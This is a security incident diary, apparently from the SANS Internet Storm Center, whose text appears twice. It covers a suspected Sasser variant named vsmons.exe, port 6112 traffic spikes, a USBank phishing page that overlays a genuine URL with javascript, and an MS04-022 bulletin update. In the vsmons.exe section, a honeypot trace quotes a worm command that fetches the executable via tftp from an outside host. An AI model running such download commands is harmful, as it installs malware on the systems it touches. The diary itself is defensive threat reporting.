Vsmons.exe / Port 6112 / USBank phishing / MS04-22 Update
Vsmons.exe
We received a report about traffic on port 445 and an application called vsmons.exe (not the Zone Alarm vsmon.exe).
If you have a sample of such application, please send to us, and our malware group will take a look at it.
UPDATE: this looks like sasser. The following hpot trace shows similar file:
tftp -i xxx.xxx.91.114 get vsmons.exe
vsmons.exe
Reference: http://wilderssecurity.com/showthread.php?t=41732
Traffic Spikes
Another report related strange traffic is about port 6112 TCP. A user noticed a spike on this port and wonder if such may be result of the recent CDE vulnerability. There were some recent spikes on the last 40 days, according ISC data, but the sources remain stable.
Reference: http://isc.sans.org/port_details.php?port=6112
USBank phishing
We received a USBank phishing report. This one is interesting because it uses a javascript to create a window with a valid usbank url on the top of the fake url.
This is interesting but not new. A post at bugtraq on may 13, shows a very similar phishing. The difference here is the fake url, that in this example is http://www.usbnk-update.info/secure and in the previous was http://validation-required.info .
Again, this only works on IE.
Reference: http://www.securityfocus.com/archive/1/363326
MS04-22 Update
Microsoft just updated the MS04-22 security bulletin. You will find more work arounds. This may help some people that had some problems with the patch.
Reference: http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)
We received a report about traffic on port 445 and an application called vsmons.exe (not the Zone Alarm vsmon.exe).
If you have a sample of such application, please send to us, and our malware group will take a look at it.
UPDATE: this looks like sasser. The following hpot trace shows similar file:
tftp -i xxx.xxx.91.114 get vsmons.exe
vsmons.exe
Reference: http://wilderssecurity.com/showthread.php?t=41732
Traffic Spikes
Another report related strange traffic is about port 6112 TCP. A user noticed a spike on this port and wonder if such may be result of the recent CDE vulnerability. There were some recent spikes on the last 40 days, according ISC data, but the sources remain stable.
Reference: http://isc.sans.org/port_details.php?port=6112
USBank phishing
We received a USBank phishing report. This one is interesting because it uses a javascript to create a window with a valid usbank url on the top of the fake url.
This is interesting but not new. A post at bugtraq on may 13, shows a very similar phishing. The difference here is the fake url, that in this example is http://www.usbnk-update.info/secure and in the previous was http://validation-required.info .
Again, this only works on IE.
Reference: http://www.securityfocus.com/archive/1/363326
MS04-22 Update
Microsoft just updated the MS04-22 security bulletin. You will find more work arounds. This may help some people that had some problems with the patch.
Reference: http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)
Keywords:
0 comment(s)
×
Diary Archives
Comments